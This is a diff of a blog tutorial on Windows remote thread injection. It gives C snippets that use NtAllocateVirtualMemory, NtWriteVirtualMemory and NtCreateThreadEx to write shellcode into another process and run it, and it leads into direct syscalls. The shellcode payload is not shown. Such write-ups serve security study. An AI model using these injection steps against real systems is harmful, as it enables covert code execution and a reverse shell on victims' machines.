AlionGreen/aliongreen.github.io/posts/remote-thread-injection.md

 ```c
 NtAllocateVirtualMemory(target_process_handle, &remote_process_buffer, 0,&buf_len ,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 ```
-we pass a void pointer named **remote_process_buffer** that will be the base address of our allocated space.
+we passed a void pointer named **remote_process_buffer** that will be the base address of the allocated space.

-### 3- writing shell code in target process
+### NtWriteVirtualMemory
-we define [NtWriteVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html) function prototype like previous steps. then call it.
+we define [NtWriteVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html) function prototype like previous steps. we should pass our shellcode, the length of the shellcode, and the base address of the allocated space as arguments.
 ```c
 typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten OPTIONAL);
 pNtWriteVirtualMemory NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
 NtWriteVirtualMemory(target_process_handle, remote_process_buffer, buf, buf_len, NULL);
 ```

-we should pass our shellcode and lenght of the shellcode and the base address of our allocated space as arguments.
-### 4- creating remote thread and runing the shellcode
+### NtCreateThreadEx
-now it's time to create a thread in our target process and run our shellcode. we use **NtCreateThreadEx** to create a remote thread in target process and run our shellcode. we should also pass 0 as the 7th argument to run the thread imideatly after creation. to see the function prototype you can look [here](https://github.com/processhacker/processhacker/blob/753a395d55634f5e5483c517219414c2ecacfc23/phnt/include/ntpsapi.h#L1814). also the desired access as i mention.
+now it's time to create a thread in our target process and run our shellcode. we use **NtCreateThreadEx** to create a remote thread in the target process and run our shellcode. we should pass 0 as the **CreateFlag** parameter to run the thread immediately after creation and 0x1FFFFF (PROCESS_ALL_ACCESS) as the **DesiredAccess** parameter. to see the function prototype, you can look [here](https://github.com/processhacker/processhacker/blob/753a395d55634f5e5483c517219414c2ecacfc23/phnt/include/ntpsapi.h#L1814).
 ```c
 NtCreateThreadEx(&thread_handle, 0x1FFFFF, NULL, target_process_handle,(LPTHREAD_START_ROUTINE)remote_process_buffer,NULL, FALSE, NULL, NULL, NULL, NULL);
 ```
-and now we have our reverse shell.

-let's go a little deeper and and implement it using syscalls
+that's it for Native APIs. let's go one step deeper and use syscalls.

 ## Direct Syscalls
 ### pros: